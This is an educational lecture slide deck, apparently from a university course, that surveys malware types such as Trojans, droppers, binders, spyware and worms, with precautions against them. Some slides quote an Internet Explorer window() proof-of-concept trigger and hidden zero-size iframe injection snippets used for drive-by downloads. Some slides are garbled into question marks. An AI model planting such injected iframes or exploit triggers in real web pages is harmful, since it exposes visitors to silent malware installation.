Title: The Attack and Defense of Computers
1- The Attack and Defense of Computers
- Dr. ? ? ?
2 3Malicious Software (Malware)
- Security tools and toolkits
- Back doors (trap doors)
- Logic bombs
- Viruses
- Worms
- Binders
- Droppers
- Trojan Horses
- Bacteria or rabbit programs.
- Spyware
- Rootkit
- URL Injection
- Dialers
4Security Tools and toolkits
- Automatically scan for computer security
weaknesses. - Can be used by both security professionals and
attackers. - E.g. Nessus, COPS, ISS, Tiger, and so on.
- There are also programs and tool sets whose only
function is to attack computers. - Script kids
- P.S. These tools may damage the systems that
install them or may contain booby-trap that will
compromise the systems that install them.
5Logic Bombs
- A logic bomb is a piece of code intentionally
inserted into a software system that will set off
a malicious function when specified conditions
are met. - For example, a programmer may hide a piece of
code that starts deleting files, should he ever
leave the company (and the salary database). - Usually written by inner programmers.
6Logic Bombs and Viruses and Worms
- Software that is inherently malicious, such as
viruses and worms, often contain logic bombs that
execute a certain payload at a pre-defined time
or when some other condition is met. - Many viruses attack their host systems on
specific dates, such as Friday the 13th or April
Fool's Day. - Trojans that activate on certain dates are often
called "time bombs".
7Key Logger
- A program or hardware device that captures every
key depression on the computer. - Also known as "Keystroke Cops," they are used to
monitor a user's activities by recording every
keystroke the user makes, including typos,
backspacing and retyping.
8Security Concerns about Key Loggers
- Keystroke logging can be achieved by both
hardware and software means. - There is no easy way to prevent keylogging
software being installed on your PC, as it is
usually done by a method of stealth. - If you are using a home PC, then it is likely to
be free on any keystroke logging hardware (but
remember there may be keystroke logging
software). - Try and avoid typing private details on public
PCs, and always try and avoid visiting sites on
public PCs that require you to enter your login
details, e.g. An online banking account.
9Example
10Dialers
- A program that
- replaces the phone number in a moderns dial-up
connection with a long distance number, often out
of the country, in order to run up phone charges
on pay-per-dial numbers - dials out at night to send keylogger or other
information to an attacker.
11URL Injection
- Change the URL submitted to a server belonging to
some or all domains.
12Bacteria and Rabbits
- Bacteria (also known as rabbit programs) are a
type of malware that create many instances of
themselves, or run many times simultaneously, in
order to consume large amounts of system
resources. - Bacteria create a denial of service effect as
legitimate programs may no longer be able to run,
or at least may not run properly.
13 14Definition of Binder
- A tool that combines two or more files into a
single file, usually for the purpose of hiding
one of them. - A binder compiles the list of files that you
select into one host file, which you can rename. - A host file is a simple custom compiled program
that will decompress and launch the embedded
programs. - When you start the host, the embedded files in it
are automatically decompressed and launched.
15Example
- When a Trojan is bound with Notepad, for
instance, the result will appear to be Notepad,
and appear to run like Notepad, but the Trojan
will also be run.
16Program
- YAB Yet Another Binder
- User Guide
17 18Definition of a Dropper
- A dropper is a program (malware component) that
has been designed to "install" some sort of
malware (virus, backdoor, etc) to a target
system. - Single stage the malware code can be contained
within the dropper in such a way as to avoid
detection by virus scanners - Two stages the dropper may download the malware
to the target machine once activated
19Types of Droppers
- There are two major types of droppers
- those that do not require user interaction
- perform through the exploitation of a system by
some vulnerability - those that require user interaction by convincing
the user that it is some legitimate or benign
program.
20Examples
21 22Trojan Horse
- In the context of computer software, a Trojan
horse is a malicious program that is disguised as
or embedded within legitimate software. - Trojans use false and fake names to trick users
into executing them. - These strategies are often collectively termed
social engineering. - A Trojan is designed to operate with functions
unknown to the victim. - The useful, or seemingly useful, functions serve
as camouflage for these undesired functions.
23Properties of Trojan Horses
- Trojan horse programs cannot operate
autonomously, in contrast to some other types of
malware, like worms. - Just as the Greeks needed the Trojans to bring
the horse inside for their plan to work, - Trojan horse programs depend on actions by the
intended victims - if Trojans replicate and even distribute
themselves, each new victim must run the
program/Trojan. - Due to the above reasons Trojan horses virulence
depends on - successful implementation of social engineering
concepts - but doesnt depend on
- the flaws in a computer system's security design
or configuration.
24Categories of Trojan Horses
- There are two common types of Trojan horses
- an otherwise useful software that has been
corrupted by a cracker inserting malicious code
that executes while the program is used. - Examples include various implementations of
- weather alerting programs
- computer clock setting software
- peer to peer file sharing utilities.
- a standalone program that masquerades as
something else, like a game or image file (e.g.
firework.jpg.exe in Windows.
25Malware Parasitizes inside Trojan Horses
- In practice, Trojan Horses in the wild often
contain - spying functions (such as a packet sniffer)
- backdoor functions that allow a computer,
unbeknownst to the owner, to be remotely
controlled from the network, creating a zombie
computer. - The Sony/BMG rootkit Trojan, distributed on
millions of music CDs through 2005, did both of
these things. - Because Trojan horses often have these harmful
behaviors, there often arises the
misunderstanding that such functions define a
Trojan Horse.
26Example of a Simple Trojan Horse
- A simple example of a Trojan horse would be a
program named waterfalls.scr.exe claiming to be a
free waterfall screensaver which, when run,
instead begins erasing all the files on the
computer.
27E-Mail Trojan Horses
- On the Microsoft Windows platform, an attacker
might attach a Trojan horse with an
innocent-looking filename to an email message
which entices the recipient into opening the
file. - The Trojan horse itself would typically be a
Windows executable program file, and thus must
have an executable filename extension such as
.exe, .com, .scr, .bat, or .pif. - Since Windows is sometimes configured by default
to hide filename extensions from a user, the
Trojan horse has an extension that might be
"masked" by giving it a name such as
Readme.txt.exe. With file extensions hidden, the
user would only see Readme.txt and could mistake
it for a harmless text file. - Icons can also be chosen to imitate the icon
associated with a different and benign program,
or file type.
28Trojan Downloader F-SecureMicrosoft
- Trojan downloader is usually a standalone program
that attempts to secretly download and run other
files from remote web and ftp sites. - Usually Trojan downloaders
- download different Trojans and backdoors
- activate them on an affected system without
user's approval. - Trojan downloader, when run, usually installs
itself to system and waits until Internet
connection becomes available. After that it
attempts to connect to a web or ftp site,
download specific file or files and run them.
29Commonly Used Methods of Infection
- Websites (??).
- E-mails.
- Downloaded Files.
30Websites
- You can be infected by visiting a rogue website.
- Internet Explorer is most often targeted by
makers of Trojans and other pests, because it
contains numerous bugs, some of which improperly
handle data (such as HTML or images) by executing
it as a legitimate program. - Attackers who find such vulnerabilities can then
specially craft a bit of malformed data so that
it contains a valid program to do their bidding. - The more "features" a web browser has (for
example ActiveX objects, and some older versions
of Flash or Java), the higher your risk of having
security holes that can be exploited by a Trojan
horse.
31Example 1 Microsoft IE window() Arbitrary Code
Execution Vulnerability Secunia
- The vulnerability is caused due to certain
objects not being initialized correctly when the
window() function is used in conjunction with the
ltbody onloadgt event. - This can be exploited to execute arbitrary code
on a vulnerable browser via some specially
crafted JavaScript code called directly when a
site has been loaded.Exampleltbody
onload"window()"gtSuccessful exploitation
requires that the user is e.g. tricked into
visiting a malicious website. - PROOF OF CONCEPT
32- Explanation Computer Terrorism
33lt body onLoad gt HTML Code Tutorial
- The browser triggers onLoad when the document is
finished loading. The contents of onLoad is one
or more JavaScript commands. So, for example, the
following lt body ...gt tag tells the browser to
bring up an alert box once the page is completely
loaded - ltBODY onLoad"alert('hello world!')"gt
34MS IE - Crash on JavaScript window()- calling (1)
- There is a bug in Microsoft Internet Explorer,
which causes a crash in it. - The bug occurs, because Microsoft Internet
Explorer can't handle a call to a
JavaScript-function with the name of the
"window"-object. -
An object used in Javascript.
35MS IE - Crash on JavaScript window()- calling (2)
symantic
- Internet Explorer fails to properly initialize
the JavaScript Window()' function. When the
'onLoad' handler is set to call the improperly
initialized Window()' function, the Web browser
attempts to call the address 0x006F005B, which is
derived from the Unicode representation of
'OBJECT'. - CALL DWORD ECX8
- It is shown that JavaScript prompt boxes can be
used by attackers to fill the memory region at
0x00600000 with attacker-supplied data, allowing
executable machine code to be placed into the
required address space.
- Crash, if pointing to non-code.
- Execution, if pointing to code.
36Dangerous Web Site
- The web site pointed by the following URL is one
containing the trap described in the previous
slides. - HTTP MSIE JavaScript OnLoad Rte CodeExec
symantic - http//marc.theaimsgroup.com/?lbugtraqm11174639
4106172w2
37Example 2 Trojan Horse Exploits Image Flaw
Declan McCullagh et al.
- EasyNews, a provider of Usenet newsgroups, said
it has identified two JPEG images that take
advantage of a previously identified flaw ( a
heap-based buffer overflow Michael Cobb ) in
the way Microsoft software handles graphics
files. - Windows users could have their computers infected
merely by opening one of those Trojan horse
images. - Attackers tried to use these JPEGs to download
Trojan (horse programs) to vulnerable computers.
38Example 3 Comprise a Web Server and Add Hidden
Download Instructions in Web Pages
- Create frame with size 0.
39 40- ?????
- ??
- SQL Injection
- ?
- ???? ?
- ?????,?????? ????????? ?? ??????? .
41????
- ???????
- ltiframe src???? width0 height0gtlt/iframegt
42JScript ????
- ?????????? xxx.js ??????????????????
- document.write("ltiframe width'0' height'0'
src'????'gtlt/iframegt") - ??JScript ??????
- ???????
- ltscript languagejavascript srcxxx.jsgtlt/scriptgt
43Emails and Trojan Horses
- The majority of Trojan horse infections occur
because the user was tricked into running an
infected program. - This is why you're not supposed to open
unexpected attachments on emails -- the program
is often a cute animation or a sexy picture, but
behind the scenes it infects the computer with a
Trojan or virus.
44Microsoft Outlook
- If you use Microsoft Outlook, you're vulnerable
to many of the same problems that Internet
Explorer has, even if you don't use IE directly. - The same vulnerabilities exist since Outlook
allows email to contain HTML and images (and
actually uses much of the same code to process
these as Internet Explorer).
45Downloaded Files
- The infected program doesn't have to arrive via
email, though it can be - sent to you in an Instant Message
- downloaded from a Web site or by FTP
- delivered on a CD or floppy disk
46Precautions against Trojan Horses (1)
- Trojan Horses are commonly spread through an
e-mail, much like other types of common viruses.
The only difference being of course is that a
Trojan Horse is hidden. - The best ways to protect yourself and your
company from Trojan Horses are as follows - If you receive e-mail from someone that you do
not know or you receive an unknown attachment
never open it right away. - As an e-mail user you should confirm the source.
- Some hackers have the ability to steal an address
books so if you see e-mail from someone you know
that does not necessarily make it safe.
47Precautions against Trojan Horses (2)
- When setting up your e-mail client make sure that
you have the settings so that attachments do not
open automatically. - Some e-mail clients come ready with an anti-virus
program that scans any attachments before they
are opened. - If your client does not come with this it would
be best to purchase on or download one for free. - Make sure your computer has an anti-virus program
on it and make sure you update it regularly. - If you have an auto-update option included in
your anti-virus program you should turn it on,
that way if you forget to update your software
you can still be protected from threats
48Precautions against Trojan Horses (3)
- Operating systems offer patches to protect their
users from certain threats and viruses, including
Trojan Horses. - Software developers like Microsoft offer patches
that in a sense close the hole that the Trojan
horse or other virus would use to get through to
your system. If you keep your system updated with
these patches your computer is kept much safer. - Avoid using peer-2-peer or P2P sharing networks
like Kazaa, Limewire, Ares, or Gnutella because - those programs are generally unprotected from
Trojan Horses - Trojan Horses are especially easy to spread
through these programs - Some of these programs do offer some virus
protection but often they are not strong enough.
49Precautions against Trojan Horses (4)
- NEVER download blindly from people or sites which
you arent 100 sure about. - However, legal web sites may be comprised by
attackers who may modify web pages to contain
scripts to download malware. - Even if the file comes form a friend, you still
must be sure what the file is before opening it.
(Ask your friend whether she/he sent the files to
you.) - Beware of hidden file extensions (Under Windows
susie.jpg.exe is only shown as susie.jpg) - Never user features in your programs that
automatically get or preview files (outlook,
preview mode ). - Never blindly type commands that others tell you
to type, or go to the web site mentioned by
strangers.
50Well-known Trojan Horses
- Back Orifice
- Back Orifice 2000
- Beast Trojan
- NetBus
- SubSeven
- Downloader-EV
- Pest Trap
- flooder
- Tagasaurus
- Vundo trojan
- Gromozon Trojan
51Experiment
- Survey some Trojan horses to see what approaches
are adopted by them to fool a user to execute
them.
52List of Trojan Horses
- http//en.wikipedia.org/wiki/List_of_trojan_horses
53 54A Large Number of Toolbars, Some Added by
Spyware, Overwhelm an IE Session
55Some Statistics about Spyware A. Moshchuk et al.
- A recent scan (2005) performed by AOL/NCSA of 329
customers computers found that 80 were infected
with spyware programs. - Each infected computer contained an average of 93
spyware components.
56Definition of Spyware
- Spyware is computer software that is installed
surreptitiously on a personal computer to - monitor
- intercept
- or
- take partial control over
- the user's interaction with the computer,
without the user's informed consent.
57Activities of Spyware
- Spyware programs can
- secretly monitor the user's behavior and then
send this information to a hacker over the
Internet - collect various types of personal information
- interfere with user control of the computer in
other ways, such as - installing additional software
- redirecting Web browser activity
- diverting advertising revenue to a third party.
58Spyware Funcions A. Moshchuk et al.
59Types of Information Collected by Spyware
- Spyware can collect many different types of
information about a user. - More benign programs can attempt to track what
types of websites a user visits and send this
information to an advertisement agency. - More malicious versions can try to record what a
user types to try to intercept passwords or
credit card numbers. - Yet other versions simply launch pop-ups with
advertisements.
60OSes vs. Spyware
- As of 2006, spyware has become one of the
pre-eminent security threats to computer-systems
running Microsoft Windows OSes. - Some malware on the Linux and Mac OS X platforms
has behavior similar to Windows spyware, but to
date has not become anywhere near as widespread.
61Spyware Certification
- The Spyware-Free Certification program evaluates
software to ensure that the program does not
install or execute any forms of malicious code.
62Typical Tactics Adopted by Spyware
- Delivery of unsolicited pop-up advertisements.
- Monitoring of Web-browsing activity for marketing
purposes. - Theft of personal information
63Adware
- The term adware frequently refers to any software
which displays advertisements, whether or not it
does so with the user's consent. - Programs such as the Eudora mail client display
advertisements as an alternative to shareware
registration fees. - These classify as "adware" in the sense of
advertising-supported software, but not as
spyware. - Adware in this form does not operate
surreptitiously or mislead the user, and provides
the user with a specific service.
64Spyware and Pop-up Ads
- Spyware displays advertisements related to what
it finds from spying on you, not the ones posted
by advertisers. - Claria Corporation's Gator Software and Exact
Advertising's BargainBuddy provide examples of
this sort of program. - Visited Web sites frequently install Gator on
client machines in a surreptitious manner, and it
directs revenue to the installing site and to
Claria by displaying advertisements to the user.
The user experiences a large number of pop-up
advertisements.
65Pop-up Ads
- Pop-up ads or popups are a form of online
advertising on the World Wide Web. - It works when certain web pages open a new web
browser window to display advertisements. - The pop-up window containing an advertisement is
usually generated by JavaScript, but can be
generated by other means as well.
66Pop-under Ads
- A variation on the pop-up window is the pop-under
advertisement. This opens a new browser window,
behind the active window. - Pop-unders interrupt the user less, but are not
seen until the desired windows are closed, making
it more difficult for the user to determine which
Web page opened them.
67Dozens of Pop-up Ads Cover a Desktop.
68Web Activity Monitor
- Other spyware behavior, such as reporting on
websites the user visits, frequently accompany
the displaying of advertisements. - Monitoring web activity aims at building up a
marketing profile on users in order to sell
"targeted" advertisement impressions. - The prevalence of spyware has cast suspicion upon
other programs that track Web browsing, even for
statistical or research purposes. - Some observers describe the Alexa Toolbar, an
Internet Explorer plug-in published by
Amazon.com, as spyware (and some anti-spyware
programs report it as such) although many users
choose to install it.
69Other Victims of Spyware
- The prevalence of spyware has cast suspicion upon
other programs that track Web browsing, even for
statistical or research purposes. - Some observers describe the Alexa Toolbar, an
Internet Explorer plug-in published by
Amazon.com, as spyware (and some anti-spyware
programs report it as such) although many users
choose to install it.
70Identity Theft and Fraud
- Some spyware is closely associated with identity
theft. - Spyware may transmit the following information to
attackers - chat sessions,
- user names,
- passwords,
- bank information, etc.
- Spyware has principally become associated with
identity theft in that keyloggers are routinely
packaged with spyware. - John Bambenek, who researches information
security, estimates that identity thieves have
stolen over 24 billion US dollars of account
information in the United States alone
71 72Routes of Infection
- Spyware does not directly spread in the manner of
a computer virus or worm - generally, an infected system does not attempt to
transmit the infection to other computers. - Instead, spyware gets on a system
- through deception of the user
- or
- through exploitation of software vulnerabilities.
73Masquerade
- One way of distributing spyware involves tricking
users by manipulating security features designed
to prevent unwanted installations.
74Masquerade - Example
- The Internet Explorer Web browser, by design,
prevents websites from initiating an unwanted
download. - Instead, a user action (such as clicking on a
link) must normally trigger a download. - However, links can prove deceptive
- For instance,
- A pop-up ad may appear like a standard Windows
dialog box. - The box contains a message such as "Would you
like to optimize your Internet access?" with
links which look like buttons reading Yes and No.
- No matter which "button" the user presses, a
download starts, placing the spyware on the
user's system.
75A Masquerade Example
- Malicious websites may attempt to install spyware
on readers' computers. - In this screenshot a website has triggered a
pop-up that offers spyware in the guise of a
security upgrade.
76Bundled with Shareware
- Spyware can also come bundled with
- shareware
- other downloadable software
- music CDs.
- The user downloads a program (for instance, a
music program or a file-trading utility) and
installs it, and the installer additionally
installs the spyware. Although the desirable
software itself may do no harm, the bundled
spyware does. - In some cases, spyware authors have paid
shareware authors to bundle spyware with their
software. - In other cases, spyware authors have repackaged
desirable free software with installers that add
spyware.
77Bundled Shareware Example
- The BearShare file-trading program, "supported"
by WhenU spyware. - In order to install BearShare, users must agree
to install "the SAVE! bundle" from WhenU. - The installer provides only a tiny window in
which to read the lengthy license agreement.
Although the installer claims otherwise, the
software transmits users' browsing activity to
WhenU servers.
78Through Trojan Horse
- Classically, a Trojan horse, by definition,
smuggles in something dangerous in the guise of
something desirable. Some spyware programs get
spread in just this manner. - The distributor of spyware presents the program
as a useful utility for instance as a Web
accelerator or as a helpful software agent. - Users download and install the software without
immediately suspecting that it could cause harm.
79Vulnerabilities in Web Browsers
- Some spyware authors infect a system by attacking
security holes - in the Web browser
- or
- in other software.
- When the user navigates to a Web page controlled
by the spyware author, the page contains code
which attacks the browser and forces the download
and install of spyware. - Common browser exploits target security
vulnerabilities in Internet Explorer and in the
Microsoft Java runtime.
80Notable Programs Distributed with Spyware
- Messenger Plus! (only if you agree to install
their "sponsor" program) - Bearshare
- Bonzi Buddy
- DAEMON Tools (only if you agree to install their
"sponsor" program) - DivX (except for the paid version, and the
"standard" version without the encoder). DivX
announced removal of GAIN software from version
5.2. - Dope Wars
- ErrorGuard
- FlashGet (free version)
- Grokster
- Kazaa
- Morpheus
- RadLight
- WeatherBug
- EDonkey2000
81 82Worms
- Worm spread themselves through proactively
attacking programs with specific vulnerability. - Most frequently used attack approaches included
buffer overflow attacks, format string attacks,
integer overflow attacks, and so on. - Morris Worm ,1988
- Code Red, Slammer.
83Comparisons between Viruses, Trojan Horses, and
Worms
- The way they behave
- How are they triggered?
- How do they spread?
- Need host programs?